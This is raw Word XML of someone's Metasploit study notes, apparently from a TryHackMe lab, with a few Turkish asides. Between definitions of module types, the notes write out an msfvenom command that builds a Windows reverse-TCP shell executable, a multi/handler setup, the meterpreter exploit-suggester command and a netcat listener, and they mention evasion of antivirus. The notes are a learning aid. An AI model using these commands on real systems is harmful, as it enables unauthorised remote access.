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3914" w14:textId="77777777" w:rsidR="00281825" w:rsidRPr="00281825" w:rsidRDefault="00281825" w:rsidP="002818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281825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Exploit:</w:t>
      </w:r>
      <w:r w:rsidRPr="00281825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 A piece of code that uses a vulnerability present on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27398BDC" w14:textId="77777777" w:rsidR="00281825" w:rsidRPr="00281825" w:rsidRDefault="00281825" w:rsidP="002818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281825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Vulnerability:</w:t>
      </w:r>
      <w:r w:rsidRPr="00281825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 A design, coding, or logic flaw affecting the target system. The exploitation of a vulnerability can result in disclosing confidential information or allowing the attacker to execute code on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B7375C" w14:textId="77777777" w:rsidR="00281825" w:rsidRDefault="00281825" w:rsidP="002818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281825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Payload:</w:t>
      </w:r>
      <w:r w:rsidRPr="00281825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 An exploit will take advantage of a vulnerability. However, if we want the exploit to have the result we want (gaining access to the target system, read confidential information, etc.), we need to use a payload. Payloads are the code that will run on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D15762" w14:textId="77777777" w:rsidR="00281825" w:rsidRDefault="00281825" w:rsidP="00281825">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:color w:val="212529"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:color w:val="212529"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Auxiliary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1229AC" w14:textId="77777777" w:rsidR="00281825" w:rsidRDefault="00281825" w:rsidP="0028182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Any supporting module, such as scanners, crawlers and fuzzers, can be found here.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C875A2A" w14:textId="77777777" w:rsidR="00281825" w:rsidRDefault="00281825" w:rsidP="00281825">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:color w:val="212529"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:color w:val="212529"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Encoders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9AD7FE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Encoders will allow you to encode the exploit and payload in the hope that a signature-based antivirus solution may miss them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725D2A33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Signature-based antivirus and security solutions have a database of known threats. They detect threats by comparing suspicious files to this database and raise an alert if there is a match. Thus encoders can have a limited success rate as antivirus solutions can perform additional checks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45631CC4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  <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Evasion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06535A68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While encoders will encode the payload, they should not be considered a direct attempt to evade antivirus software. On the other hand, “evasion” modules will try that, with more or less success.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6EB127" w14:textId="77777777" w:rsidR="00281825" w:rsidRPr="00281825" w:rsidRDefault="00281825" w:rsidP="00281825">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing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281825">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538ED964" w14:textId="77777777" w:rsidR="00281825" w:rsidRPr="00281825" w:rsidRDefault="00281825" w:rsidP="00281825">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing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281825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Exploits, neatly organized by target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A36C252" w14:textId="77777777" w:rsidR="00281825" w:rsidRPr="00281825" w:rsidRDefault="00281825" w:rsidP="00281825">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF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</w:p>
    <w:p w14:paraId="6F7F1084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  <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A97982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Payloads are codes that will run on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B9DE31" w14:textId="77777777" w:rsidR="00281825" w:rsidRDefault="00281825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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:color w:val="0E101A"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Post</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8DC20F" w14:textId="39D5E9E4" w:rsidR="00281825" w:rsidRPr="006804C0" w:rsidRDefault="00281825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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:color w:val="0E101A"/>
        </w:rPr>
        <w:t>Post modules will be useful on the final stage of the penetration testing process listed above, post-exploitatio</w:t>
      </w:r>
      <w:r w:rsidR="006804C0" w:rsidRPr="006804C0">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:color w:val="0E101A"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BF7B84" w14:textId="77777777" w:rsidR="00417991" w:rsidRDefault="00417991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</w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D1EA673" w14:textId="049A515C" w:rsidR="00417991" w:rsidRPr="00771B23" w:rsidRDefault="00417991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  <w:r w:rsidRPr="00771B23">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:color w:val="0E101A"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Local exploit suggester</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B697705" w14:textId="41922B71" w:rsidR="00417991" w:rsidRPr="00771B23" w:rsidRDefault="00417991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  <w:r w:rsidRPr="00771B23">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:color w:val="0E101A"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Search suggester</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D6A5B3" w14:textId="77777777" w:rsidR="004546DD" w:rsidRPr="00771B23" w:rsidRDefault="004546DD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</w:p>
    <w:p w14:paraId="1DB51624" w14:textId="76B56947" w:rsidR="004546DD" w:rsidRDefault="004546DD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  <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004546DD">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:color w:val="0E101A"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004546DD">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:color w:val="0E101A"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; run post/multi/recon/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004546DD">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:color w:val="0E101A"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>local_exploit_suggester</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6E9F3401" w14:textId="77777777" w:rsidR="004546DD" w:rsidRDefault="004546DD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</w:p>
    <w:p w14:paraId="0E3704F2" w14:textId="62AC2036" w:rsidR="004546DD" w:rsidRPr="00771B23" w:rsidRDefault="004546DD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de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00771B23">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:color w:val="0E101A"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>yetkiyi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00771B23">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:color w:val="0E101A"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00771B23">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:color w:val="0E101A"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>büyütemeyince</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7EEB8941" w14:textId="77777777" w:rsidR="00771B23" w:rsidRPr="00771B23" w:rsidRDefault="00771B23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de-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11952FF9" w14:textId="3641E147" w:rsidR="00771B23" w:rsidRDefault="00771B23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de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00771B23">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:color w:val="0E101A"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00771B23">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:color w:val="0E101A"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> da ne </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:color w:val="0E101A"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>yükleyebilirsin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:color w:val="0E101A"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:color w:val="0E101A"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:color w:val="0E101A"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>load</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:color w:val="0E101A"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1A9EA1" w14:textId="77777777" w:rsidR="00771B23" w:rsidRDefault="00771B23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de-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="790BC36A" w14:textId="635A5C99" w:rsidR="00771B23" w:rsidRPr="006804C0" w:rsidRDefault="00771B23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  <w:r w:rsidRPr="006804C0">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:color w:val="0E101A"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msfvenom yeniden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23030238" w14:textId="77777777" w:rsidR="00771B23" w:rsidRPr="006804C0" w:rsidRDefault="00771B23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</w:p>
    <w:p w14:paraId="489765A2" w14:textId="501105BB" w:rsidR="00771B23" w:rsidRDefault="00771B23" w:rsidP="00281825">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
        </w:rPr>
        <w:t>msfvenom -p windows/x64/shell/reverse_tcp -f exe -o shell.exe LHOST=&lt;listen-IP&gt; LPORT=&lt;listen-port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BD02CD" w14:textId="77777777" w:rsidR="00AB1BEE" w:rsidRDefault="00AB1BEE" w:rsidP="00281825">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02D56C68" w14:textId="77777777" w:rsidR="00AB1BEE" w:rsidRPr="00AB1BEE" w:rsidRDefault="00AB1BEE" w:rsidP="00AB1B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-f</w:t>
      </w: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 &lt;format&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AC8422" w14:textId="77777777" w:rsidR="00AB1BEE" w:rsidRPr="00AB1BEE" w:rsidRDefault="00AB1BEE" w:rsidP="00AB1BE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Specifies the output format. In this case that is an executable (exe)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0555E898" w14:textId="77777777" w:rsidR="00AB1BEE" w:rsidRPr="00AB1BEE" w:rsidRDefault="00AB1BEE" w:rsidP="00AB1B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-o </w:t>
      </w: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&lt;file&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC8CA56" w14:textId="77777777" w:rsidR="00AB1BEE" w:rsidRPr="00AB1BEE" w:rsidRDefault="00AB1BEE" w:rsidP="00AB1BE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The output location and filename for the generated payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71072B24" w14:textId="77777777" w:rsidR="00AB1BEE" w:rsidRPr="00AB1BEE" w:rsidRDefault="00AB1BEE" w:rsidP="00AB1B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LHOST=</w:t>
      </w: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&lt;IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0F057B" w14:textId="77777777" w:rsidR="00AB1BEE" w:rsidRPr="00AB1BEE" w:rsidRDefault="00AB1BEE" w:rsidP="00AB1BE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Specifies the IP to connect back to. When using TryHackMe, this will be your </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00AB1BEE">
          <w:rPr>
            <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
            <w:color w:val="007BFF"/>
            <w:kern w:val="0"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="en-GB"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>tun0 IP address</w:t>
        </w:r>
      </w:hyperlink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. If you cannot load the link then you are not </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00AB1BEE">
          <w:rPr>
            <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
            <w:color w:val="007BFF"/>
            <w:kern w:val="0"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="en-GB"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>connected to the VPN</w:t>
        </w:r>
      </w:hyperlink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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A520DD5" w14:textId="77777777" w:rsidR="00AB1BEE" w:rsidRPr="00AB1BEE" w:rsidRDefault="00AB1BEE" w:rsidP="00AB1B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b/>
          <w:bCs/>
          <w:color w:val="212529"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>LPORT=</w:t>
      </w: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&lt;port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E98F87" w14:textId="77777777" w:rsidR="00AB1BEE" w:rsidRDefault="00AB1BEE" w:rsidP="00AB1BE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The port on the local machine to connect back to. This can be anything between 0 and 65535 that isn't already in use; however, ports below 1024 are restricted and require a listener running with root privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255FEC0F" w14:textId="3300AE6B" w:rsidR="00AB1BEE" w:rsidRDefault="00AB1BEE" w:rsidP="00AB1BEE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FFFFFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
        </w:rPr>
        <w:t>msfvenom --list payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B67CF85" w14:textId="77777777" w:rsidR="00AB1BEE" w:rsidRPr="00AB1BEE" w:rsidRDefault="00AB1BEE" w:rsidP="00AB1BEE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing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b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Multi/Handler</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB1BEE">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w: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is a superb tool for catching reverse shells. It's essential if you want to use Meterpreter shells, and is the go-to when using staged payloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4890DAA3" w14:textId="77777777" w:rsidR="00AB1BEE" w:rsidRPr="00AB1BEE" w:rsidRDefault="00AB1BEE" w:rsidP="00AB1BEE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing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Fortunately, it's relatively easy to use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78207754" w14:textId="77777777" w:rsidR="00AB1BEE" w:rsidRPr="00AB1BEE" w:rsidRDefault="00AB1BEE" w:rsidP="00AB1BE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Open Metasploit with </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB1BEE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212C42"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108EC2BC" w14:textId="77777777" w:rsidR="00AB1BEE" w:rsidRPr="00AB1BEE" w:rsidRDefault="00AB1BEE" w:rsidP="00AB1BE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Type </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB1BEE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212C42"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>use multi/handler</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB1BEE"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  <w:t>, and press enter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B7DD20" w14:textId="77777777" w:rsidR="001D5E9F" w:rsidRDefault="001D5E9F" w:rsidP="00AB1BEE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FFFFFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E5CAF61" w14:textId="77777777" w:rsidR="001D5E9F" w:rsidRDefault="001D5E9F" w:rsidP="001D5E9F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We should now be ready to start the listener!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C0F45A" w14:textId="77777777" w:rsidR="001D5E9F" w:rsidRDefault="001D5E9F" w:rsidP="001D5E9F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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:color w:val="212529"/>
        </w:rPr>
        <w:t>Let's do this by using the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
        </w:rPr>
        <w:t>exploit -j</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:color w:val="212529"/>
        </w:rPr>
        <w:t> command. This tells Metasploit to launch the module, running as a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="212529"/>
        </w:rPr>
        <w:t>j</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:color w:val="212529"/>
        </w:rPr>
        <w:t>ob in the background.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781FFED7" w14:textId="77777777" w:rsidR="00DE5B09" w:rsidRPr="006804C0" w:rsidRDefault="00DE5B09" w:rsidP="001D5E9F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="212529"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EBA59A5" w14:textId="77777777" w:rsidR="00DE5B09" w:rsidRPr="006804C0" w:rsidRDefault="00DE5B09" w:rsidP="001D5E9F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="212529"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2133112F" w14:textId="77777777" w:rsidR="00DE5B09" w:rsidRPr="006804C0" w:rsidRDefault="00DE5B09" w:rsidP="001D5E9F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="212529"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5446C4F6" w14:textId="77777777" w:rsidR="00DE5B09" w:rsidRPr="006804C0" w:rsidRDefault="00DE5B09" w:rsidP="001D5E9F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="212529"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B416AE9" w14:textId="3F26F30B" w:rsidR="001D5E9F" w:rsidRPr="006804C0" w:rsidRDefault="00DE5B09" w:rsidP="001D5E9F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="212529"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006804C0">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="212529"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>NETCAT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15160D8E" w14:textId="77777777" w:rsidR="00DE5B09" w:rsidRPr="00DE5B09" w:rsidRDefault="00DE5B09" w:rsidP="00DE5B09">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="480" w:line="480" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE5B09">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>On the attacking machine enter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A12B4F7" w14:textId="77777777" w:rsidR="00DE5B09" w:rsidRDefault="00DE5B09" w:rsidP="00DE5B0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92929"/>
          <w:spacing w:val="-5"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE5B09">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:eastAsia="Times New Roman" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-5"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>nc -lvnp &lt;port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CBE630" w14:textId="77777777" w:rsidR="00DE5B09" w:rsidRDefault="00DE5B09" w:rsidP="00DE5B0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92929"/>
          <w:spacing w:val="-5"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="499455D4" w14:textId="77777777" w:rsidR="00DE5B09" w:rsidRDefault="00DE5B09" w:rsidP="00DE5B0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92929"/>
          <w:spacing w:val="-5"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
